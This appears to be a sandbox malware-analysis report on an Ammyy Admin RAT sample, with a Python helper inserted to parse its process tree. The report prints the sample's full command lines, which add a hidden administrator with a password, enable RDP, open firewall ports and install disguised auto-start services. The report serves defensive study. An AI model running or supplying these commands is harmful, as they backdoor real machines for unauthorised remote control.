"C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe"

Signatures

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A

Grants admin privileges

Creates new service(s)

persistence execution

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PlugAndPlay\ImagePath = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\svchost.exe -service -debug" C:\Windows\SysWOW64\REG.exe N/A

Stops running service(s)

evasion execution

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe N/A

Password Policy Discovery

discovery

Hide Artifacts: Hidden Users

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Microsoft = "0" C:\Windows\SysWOW64\REG.exe N/A

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Permission Groups Discovery: Local Groups

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\REG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\REG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\REG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\REG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\REG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\REG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1448 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe
PID 1448 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe
PID 1448 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe
PID 1448 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1448 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1448 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1448 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1448 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1448 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1448 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1448 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1448 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1448 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2036 wrote to memory of 552 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2036 wrote to memory of 552 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2036 wrote to memory of 552 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1448 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 4524 wrote to memory of 3404 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4524 wrote to memory of 3404 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4524 wrote to memory of 3404 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1448 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1448 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1448 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1448 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1448 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1448 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1448 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1448 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1448 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1448 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1448 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1448 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2996 wrote to memory of 2912 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2996 wrote to memory of 2912 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2996 wrote to memory of 2912 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4116 wrote to memory of 2272 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4116 wrote to memory of 2272 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4116 wrote to memory of 2272 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3284 wrote to memory of 2104 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3284 wrote to memory of 2104 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3284 wrote to memory of 2104 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2496 wrote to memory of 1440 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2496 wrote to memory of 1440 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2496 wrote to memory of 1440 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2908 wrote to memory of 3264 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
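The table above is capped at 64 rows (the last pair, 2908 to 3264, shows only one of its writes) and otherwise lists every parent/child pair exactly three times. The Python below is an added example, not part of the sandbox report: it rebuilds the process tree from rows in this format, counts writes per pair and flags any pair whose count departs from the common value. A uniform count for every child that also shows up in the Processes list with its own command line is what process creation looks like here; an outlier, especially one targeting a process the sample did not start, would deserve a closer look. The sample rows are copied from this report; the uniform-count heuristic is the example's own assumption.

```python
import re
from collections import Counter

# Constructed sample: a subset of the rows from the table above, rebuilt as the
# plain text "PID <parent> wrote to memory of <child> N/A <process> <target>".
SAMPLE_EXE = r"C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe"
TERMSERV = r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe"
SC = r"C:\Windows\SysWOW64\sc.exe"
NET = r"C:\Windows\SysWOW64\net.exe"
NET1 = r"C:\Windows\SysWOW64\net1.exe"


def _rows(parent, child, ppath, cpath, n):
    return [f"PID {parent} wrote to memory of {child} N/A {ppath} {cpath}"] * n


SAMPLE_ROWS = "\n".join(
    _rows(1448, 4656, SAMPLE_EXE, TERMSERV, 3)
    + _rows(1448, 3676, SAMPLE_EXE, SC, 3)
    + _rows(1448, 2036, SAMPLE_EXE, NET, 3)
    + _rows(2036, 552, NET, NET1, 3)
    + _rows(1448, 2908, SAMPLE_EXE, NET, 3)
    + _rows(2908, 3264, NET, NET1, 1)  # the report's table is capped at 64 rows and ends here
)

# Paths contain spaces ("Network Shortcuts"), so split on the ".exe" boundary
# rather than on whitespace: the first path is matched non-greedily.
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (.+?\.exe) (.+\.exe)$")


def parse_rows(text):
    """Return (names, writes): pid -> image path, and (parent, child) -> write count."""
    names, writes = {}, Counter()
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if not m:
            raise ValueError(f"unparsed row: {line!r}")
        parent, child = int(m[1]), int(m[2])
        names.setdefault(parent, m[3])
        names.setdefault(child, m[4])
        writes[(parent, child)] += 1
    return names, writes


def children_of(writes, pid):
    return sorted(c for (p, c) in writes if p == pid)


def roots(writes):
    """PIDs that write to others but were never written to (the initial sample)."""
    parents = {p for p, _ in writes}
    kids = {c for _, c in writes}
    return sorted(parents - kids)


def render_tree(names, writes, pid, depth=0):
    """Indented process tree as a list of lines, children in PID order."""
    lines = [f"{'  ' * depth}{pid} {names[pid]}"]
    for c in children_of(writes, pid):
        lines.extend(render_tree(names, writes, c, depth + 1))
    return lines


def injection_suspects(writes):
    """Pairs whose write count differs from the most common per-child count.

    Heuristic (assumption): spawning a child produces the same fixed number of
    writes every time, so a deviating pair is either injection into an already
    running process or, as with 2908 -> 3264 here, a truncated table.
    """
    common = Counter(writes.values()).most_common(1)[0][0]
    return {pair: n for pair, n in writes.items() if n != common}


NAMES, WRITES = parse_rows(SAMPLE_ROWS)
TREE = render_tree(NAMES, WRITES, roots(WRITES)[0])

if __name__ == "__main__":
    print("\n".join(TREE))
    print("deviating pairs:", injection_suspects(WRITES))
```

Cross-check any pair the heuristic reports against the Processes list below: a child that appears there with its own command line was started by the parent, not injected into.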

Processes

C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4164,i,1330210614411927383,9239043499051775691,262144 --variations-seed-version --mojo-platform-channel-handle=1320 /prefetch:8

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe" -silent

C:\Windows\SysWOW64\sc.exe

sc start mnmsrvc

C:\Windows\SysWOW64\sc.exe

sc Start TlntSvr

C:\Windows\SysWOW64\sc.exe

sc Start TermService

C:\Windows\SysWOW64\net.exe

net start FastUserSwitchingCompatibility

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start FastUserSwitchingCompatibility

C:\Windows\SysWOW64\net.exe

net start TermService

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\SysWOW64\REG.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\REG.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\net.exe

net user Microsoft skj2g43 /add /EXPIRES:NEVER /active:yes

C:\Windows\SysWOW64\net.exe

net localgroup Microsoft /add

C:\Windows\SysWOW64\net.exe

net localgroup Администраторы Microsoft /add

C:\Windows\SysWOW64\net.exe

net localgroup Administrators Microsoft /add

C:\Windows\SysWOW64\net.exe

net accounts /maxpwage:unlimited

C:\Windows\SysWOW64\REG.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Microsoft /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\sc.exe

sc stop "ProtocolWindows_ "

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user Microsoft skj2g43 /add /EXPIRES:NEVER /active:yes

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup Microsoft /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 accounts /maxpwage:unlimited

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup Администраторы Microsoft /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup Administrators Microsoft /add

C:\Windows\SysWOW64\sc.exe

sc delete "ProtocolWindows_ "

C:\Windows\SysWOW64\sc.exe

sc create "ProtocolWindows_ " binpath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\lsass.exe" displayname= "Protocol HTTP/SSL " type= own start= auto error= ignore

C:\Windows\SysWOW64\sc.exe

sc description "ProtocolWindows_ " "Эта служба обеспечивает безопасный протокол передачи данных гипертекста (HTTPS) для службы HTTP. Если эта служба отключена, любые службы, которые явно зависят от нее, не могут быть запущены. "

(Russian, decoded from CP1251 text that had been rendered as Latin-1; the original string substitutes a Latin "a" for the Cyrillic "а" in several words. Translation: "This service provides the secure hypertext transfer protocol (HTTPS) for the HTTP service. If this service is disabled, any services that explicitly depend on it cannot be started." The text imitates the description of the built-in HTTP SSL service, matching the display name "Protocol HTTP/SSL ".)

C:\Windows\SysWOW64\sc.exe

sc stop "PlugAndPlay"

C:\Windows\SysWOW64\sc.exe

sc delete "PlugAndPlay"

C:\Windows\SysWOW64\sc.exe

sc create "PlugAndPlay" displayname= "PlugAndPlay " binpath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\svchost.exe -service -debug" type= own start= auto error= ignore

C:\Windows\SysWOW64\REG.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\services\PlugAndPlay" /v ImagePath /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\svchost.exe -service -debug" /f

C:\Windows\SysWOW64\REG.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_REGDWORD /d 3389 /f

C:\Windows\SysWOW64\REG.exe

REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN" /v iexplore.exe /t REG_REGDWORD /d 0 /f

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\svchost.exe" ENABLE

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\lsass.exe" ENABLE

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram ctfmon.exe ENABLE

C:\Windows\SysWOW64\netsh.exe

netsh firewall add portopening protocol = TCP port = 3389 name = TCP

C:\Windows\SysWOW64\netsh.exe

netsh firewall add portopening protocol = TCP port = 31337 name = TCP

C:\Windows\SysWOW64\netsh.exe

netsh firewall add portopening protocol = TCP port = 80 name = TCP

C:\Windows\SysWOW64\netsh.exe

netsh firewall add portopening protocol = TCP port = 8080 name = TCP
